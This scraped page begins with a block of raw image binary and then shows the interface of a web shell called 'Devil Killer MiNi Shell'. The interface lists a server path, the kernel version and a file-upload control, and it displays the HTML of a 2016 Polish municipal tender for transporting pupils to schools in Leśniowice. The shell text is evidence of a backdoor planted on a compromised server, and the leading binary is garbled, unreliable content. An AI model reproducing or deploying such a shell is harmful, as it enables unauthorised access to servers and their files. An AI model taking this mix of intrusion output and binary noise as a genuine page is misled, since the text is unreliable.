JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160628/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160628/106601-N-2016.html

<p class="kh_header"><b>Leśniowice: Dowóz uczniów do szkół podstawowych i gimnazjum na terenie gminy Leśniowice w roku szkolnym 2016-2017i 2017-2018</b><br>
<b>Numer ogłoszenia: 106601 - 2016; data zamieszczenia: 28.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Leśniowice , Leśniowice 21A, 22-122 Leśniowice, woj. lubelskie, tel. 82 567 54 94, faks 82 567 54 94.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lesniowice.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów do szkół podstawowych i gimnazjum na terenie gminy Leśniowice w roku szkolnym 2016-2017i 2017-2018.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dowóz uczniów w roku szkolnym 2016/2017 i 2017/2018 do:
Publicznego Gimnazjum w Sielcu,
Szkoły Podstawowej w Leśniowicach,
Szkoły Podstawowej w Teresinie,
Szkoły Podstawowej w Sielcu w godzinach porannych i z powrotem po zakończeniu zajęć dydaktyczno-wychowawczych zgodnie z poniższym zestawieniem.

Zadanie A
Część I - Dowóz uczniów w następujących kierunkach rannych:
Trasa 1 
1.Wygnańce - Publiczne Gimnazjum w Sielcu - przewidywana liczba uczniów 2, śr. długość trasy 13 km
2.Poniatówka - Szkoła Podstawowa w Teresinie - przewidywana liczba uczniów 17, śr. długość trasy 8 km - Publiczne Gimnazjum w Sielcu - przewidywana liczba uczniów 3, śr. długość trasy 12 km
3.Sarniak - Publiczne Gimnazjum w Sielcu - przewidywana liczba uczniów 1, śr. długość trasy 9 km
4.Wierzbica - Szkoła Podstawowa w Leśniowicach - przewidywana liczba uczniów  3, śr. długość trasy 6 km - Publiczne Gimnazjum w Sielcu - przewidywana liczba uczniów 4, śr. długość trasy 7 km
5.Alojzów - Szkoła Podstawowa w Teresinie przewidywana liczba uczniów 4, śr. długość trasy 4 km - Szkoła Podstawowa w Leśniowicach - przewidywana liczba uczniów 8, śr. długość trasy 4 km
6.Teresin - Szkoła Podstawowa w Teresinie przewidywana liczba uczniów 10, śr. długość trasy 6 km - Publiczne Gimnazjum w Sielcu - przewidywana liczba uczniów 8, śr. długość trasy 6 km
7.Leśniowice Kolonia - Szkoła Podstawowa w Leśniowicach - przewidywana liczba uczniów 6, śr. długość trasy 4,5 km - Publiczne Gimnazjum w Sielcu - przewidywana liczba uczniów 6, śr. długość trasy 10 km
8.Leśniowice -  Publiczne Gimnazjum w Sielcu przewidywana liczba uczniów 9, śr. długość trasy 7 km

Odwóz uczniów w następujących kierunkach popołudniowych:
Trasa 1
1.Publiczne Gimnazjum w Sielcu - Leśniowice, przewidywana liczba uczniów 9, śr. długość trasy 7 km
2.Publiczne Gimnazjum w Sielcu - Leśniowice Kolonia, przewidywana liczba uczniów 6,
śr. długość trasy 10 km - Szkoła Podstawowa w Leśniowicach - Leśniowice Kolonia - przewidywana liczba uczniów 6, śr. długość trasy 4,5 km
3.Publiczne Gimnazjum w Sielcu - Teresin, przewidywana liczba uczniów 8, śr. długość trasy 6 km - Szkoła Podstawowa w Teresinie - Teresin przewidywana liczba uczniów 10, śr. długość trasy 6 km
4.Szkoła Podstawowa w Teresinie - Alojzów przewidywana liczba uczniów 4, śr. długość trasy 4 km - Szkoła Podstawowa w Leśniowicach - Alojzów - przewidywana liczba uczniów 8, śr. długość trasy 4 km
5.Publiczne Gimnazjum w Sielcu - Wierzbica, przewidywana liczba uczniów 4, śr. długość trasy 7 km - Szkoła Podstawowa w Leśniowicach - Wierzbica - przewidywana liczba uczniów 3, śr. długość trasy 6 km
6.Publiczne Gimnazjum w Sielcu - Sarniak, przewidywana liczba uczniów 1, śr. długość trasy 9 km 
7.Publiczne Gimnazjum w Sielcu - Poniatówka, przewidywana liczba uczniów 3, śr. długość trasy 12 km - Szkoła Podstawowa w Teresinie - Poniatówka przewidywana liczba uczniów 17, śr. długość trasy 8 km
8.Publiczne Gimnazjum w Sielcu - Wygnańce przewidywana liczba uczniów 2, śr. długość trasy 13 km

Część II - Dowóz uczniów w następujących kierunkach rannych:
Trasa 1 
1.Dębina - Publiczne Gimnazjum w Sielcu - przewidywana liczba uczniów 9, śr. długość trasy 5 km - Szkoła Podstawowa w Sielcu - przewidywana liczba uczniów 6, śr. długość trasy 7 km
2.Kasiłan - Szkoła Podstawowa w Sielcu - przewidywana liczba uczniów 10, śr. długość trasy 4 km
Trasa 2
1.Kumów Plebański - Szkoła Podstawowa w Sielcu przewidywana liczba uczniów 1,
śr. długość trasy 4 km 
2.Kumów Majoracki - Szkoła Podstawowa w Sielcu przewidywana liczba uczniów 7,
śr. długość trasy 4 km 

Odwóz uczniów w następujących kierunkach popołudniowych:
Trasa 1 x 2
1.Szkoła Podstawowa w Sielcu - Kumów Plebański przewidywana liczba uczniów 1,
śr. długość trasy 4 km
2.Szkoła Podstawowa w Sielcu - Kumów Majoracki przewidywana liczba uczniów 7,
śr. długość trasy 4 km 
3.Szkoła Podstawowa w Sielcu - Kasiłan przewidywana liczba uczniów 10, śr. długość trasy 4 km
4.Szkoła Podstawowa w Sielcu - Dębina przewidywana liczba uczniów 6, śr. długość trasy 7 km 

Zadanie B
Część I - Dowóz uczniów w następujących kierunkach rannych:
Trasa 1 
1.Rakołupy Duże - Publiczne Gimnazjum w Sielcu - przewidywana liczba uczniów 2,
śr. długość trasy 14 km
2.Rakołupy - Publiczne Gimnazjum w Sielcu - przewidywana liczba uczniów 5, śr. długość trasy 13 km
3.Horodysko - Szkoła Podstawowa w Leśniowicach - przewidywana liczba uczniów 1,
śr. długość trasy 5 km - Publiczne Gimnazjum w Sielcu - przewidywana liczba uczniów 6, śr. długość trasy 15 km
4.Plisków Kolonia - Publiczne Gimnazjum w Sielcu przewidywana liczba uczniów 3,
śr. długość trasy 16 km
5.Plisków - Publiczne Gimnazjum w Sielcu - przewidywana liczba uczniów 7, śr. długość trasy 14 km
6.Majdan Leśniowski - Publiczne Gimnazjum w Sielcu przewidywana liczba uczniów 5,
śr. długość trasy 5 km
7.Alojzów - Publiczne Gimnazjum w Sielcu przewidywana liczba uczniów 10, śr. długość trasy 5 km
Odwóz uczniów w następujących kierunkach popołudniowych:
Trasa 1 
1.Publiczne Gimnazjum w Sielcu - Majdan Leśniowski, przewidywana liczba uczniów 5,
śr. długość trasy 5 km
2.Publiczne Gimnazjum w Sielcu - Rakołupy, przewidywana liczba uczniów 5, śr. długość trasy 13 km
3.Publiczne Gimnazjum w Sielcu - Plisków, przewidywana liczba uczniów 7, śr. długość trasy 14 km
4.Publiczne Gimnazjum w Sielcu - Rakołupy Duże, przewidywana liczba uczniów 2,
śr. długość trasy 13 km
5.Publiczne Gimnazjum w Sielcu - Teresin, przewidywana liczba uczniów 8, śr. długość trasy 6 km
6.Publiczne Gimnazjum w Sielcu - Sarniak, przewidywana liczba uczniów 1, śr. długość trasy 9 km
7.Publiczne Gimnazjum w Sielcu  - Poniatówka, przewidywana liczba uczniów 3,
śr. długość trasy 12 km
Trasa 2 
1.Publiczne Gimnazjum w Sielcu - Alojzów, przewidywana liczba uczniów 10, śr. długość trasy 5 km
2.Publiczne Gimnazjum w Sielcu - Wierzbica, przewidywana liczba uczniów 4, śr. długość trasy 7 km
Trasa 3
1.Publiczne Gimnazjum w Sielcu - Dębina, przewidywana liczba uczniów 9, śr. długość trasy 5 km
2.Publiczne Gimnazjum w Sielcu - Leśniowice, przewidywana liczba uczniów 9, śr. długość trasy 7 km
3.Publiczne Gimnazjum w Sielcu - Rakołupy, przewidywana liczba uczniów 5, śr. długość trasy 13 km 
Trasa 4
1.Publiczne Gimnazjum w Sielcu - Majdan Leśniowski, przewidywana liczba uczniów 5,
śr. długość trasy 5km
2.Publiczne Gimnazjum w Sielcu - Leśniowice, przewidywana liczba uczniów 9, śr. długość trasy 7 km
3.Publiczne Gimnazjum w Sielcu - Rakołupy, przewidywana liczba uczniów 5, śr. długość trasy 13 km
4.Publiczne Gimnazjum w Sielcu - Plisków, przewidywana liczba uczniów 7, śr. długość trasy 14 km
5.Publiczne Gimnazjum w Sielcu - Kolonia Plisków, przewidywana liczba uczniów 3,
śr. długość trasy 16 km
6.Publiczne Gimnazjum w Sielcu - Horodysko, przewidywana liczba uczniów 6, śr. długość trasy 15 km
Łączna liczba uczniów objętych dowozem do szkół wynosi 153 i może ona ulec zmianie podczas obowiązywania zamówienia. W przypadku zmniejszenia ilości uczniów Zamawiający przewiduje wprowadzenie aneksu do zawartej umowy uwzględniającej zmiany ilości dowożonych uczniów.
 Pod pojęciem dowóz uczniów rozumie się dowóz uczniów z miejsca zamieszkania do szkół i odwóz do miejsca zamieszkania wraz z zapewnieniem opieki w trakcie przewozu oraz warunków bezpieczeństwa i higieny w trakcie wsiadania, wysiadania i przejazdu autobusem przez kierowcę.
Zamawiający wymaga, aby Wykonawca dysponował autobusami z ilością miejsc w pojazdach oraz odpowiednią liczbą autobusów, zapewniających dowóz wszystkich uczniów na poszczególnych trasach w wyznaczonych godzinach. Przy usłudze dowożenia uwzględnia się tylko ilość miejsc siedzących w pojeździe na danej trasie.
Czas przewozu jest uzależniony od rozkładu zajęć szkolnych i uzgadniany z dyrekcjami szkół.
Zamawiający zastrzega sobie możliwość wprowadzenia na określone dni innego niż ustalony rozkład jazdy po wcześniejszym powiadomieniu wykonawcy.
Szczegółowa imienna lista uczniów dla których zostaną zakupione bilety miesięczne zostanie podana Wykonawcy przed rozpoczęciem roku szkolnego.
Uczniowie są objęci całodobowym ubezpieczeniem przez placówki do których uczęszczają.
W razie awarii pojazdu wykonawca zobowiązany jest do podstawienia pojazdu zastępczego.
Wykonawca ponosi pełną odpowiedzialność za realizację usługi, stan pojazdu i bezpieczeństwo pasażerów zgodnie z obowiązującymi przepisami.
Zamawiający zastrzega sobie możliwość odstępstwa od przewidzianego przewozu, uzależnione od zmiany planów lekcji, ilości dzieci, likwidacji szkół, zmiany organizacji roku szkolnego, odpracowania dni wolnych itp.
Przy dowożeniu uczniów kursami ogólnodostępnymi Wykonawca musi uruchomić w razie potrzeby dodatkowe kursy, aby zapewnić uczniom bezpieczne i higieniczne warunki w czasie przewozu - każdy dowożony uczeń musi mieć zapewnione miejsce siedzące.
 Rozliczenia będą dokonywane w cyklu miesięcznym i na podstawie wystawionych faktur za miesięczne bilety imienne.
Zamawiający nie dopuszcza składania ofert wariantowych ani częściowych.
Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 20% wartości zamówienia podstawowego.
Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej.
Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium przez Wykonawców.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy złożyć oświadczenie o spełnianiu przez wykonawcę wymaganych warunków określonych art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych oraz  licencji na wykonywanie krajowego transportu drogowego osób zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. z 2013 r. poz. 1414, z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku niezbędnego doświadczenia uważane będzie wykazanie przez Wykonawcę realizacji minimum 2 usług o wartości min. 100 000 zł brutto każda w zakresie dowożenia uczniów do szkół w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Realizacja usług może zostać wykazana poprzez przedstawienie odpowiednich poświadczeń, referencji, zaświadczeń. Ocena spełnienia warunku na podstawie złożonego załącznik nr 4</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku posiadania potencjału technicznego będzie uważane dysponowanie min. 4 autobusami o ilości miejsc siedzących min. 39 każdy. Należy pamiętać również, że jeżeli Wykonawca polega na zasobach innego podmiotu zgodnie z art. 26 ust. 2 Pzp, to zgodnie z SIWZ należy załączyć do oferty zobowiązanie innego podmiotu do oddania mu do dyspozycji niezbędnych zasobów na czas wykonywania zamówienia. Ocena spełnienia warunku na podstawie złożonego - załącznik nr 5</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku posiadania potencjału technicznego będzie uważane zatrudnienie min. 4 kierowców posiadających wymagane kwalifikacje i doświadczenie w przewozie osób. Ocena spełnienia warunku na podstawie złożonego załącznika nr 6 oraz złożonego oświadczenia, że kierowcy, którzy będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia - załącznik nr 7,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku uważane będzie przedłożenie:
1)Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania wniosku o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia w kwocie odpowiadającej minimum 150 000 zł (sto pięćdziesiąt tysięcy zł).
2)Polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę gwarantowaną min. 150 000 zł (sto pięćdziesiąt tysięcy zł).
W przypadku wykonawców występujących wspólnie Zamawiający dokona łącznej oceny wykonawców w zakresie spełniania wyżej opisanych warunków. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą: spełnia lub nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin płatności za fakturę - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Postanowienia dotyczące realizacji niniejszego zamówienia zawiera projekt umowy -załącznik nr 9 do SIWZ. Projekt umowy zawiera wszelkie istotne dla Zamawiającego i Wykonawcy warunki realizacji zamówienia oraz klauzule dotyczące możliwości i warunki zmiany umowy w sprawie zamówienia publicznego, które zostały również opublikowane w ogłoszeniu o zamówieniu</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lesniowicce.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Leśniowice,Leśniowice 21A 22-122 Leśniowice, pok nr.15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.07.2016 godzina 13:00, miejsce: Gmina Leśniowice,Leśniowice 21A 22-122 Leśniowice, Sekretariat pok nr.5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





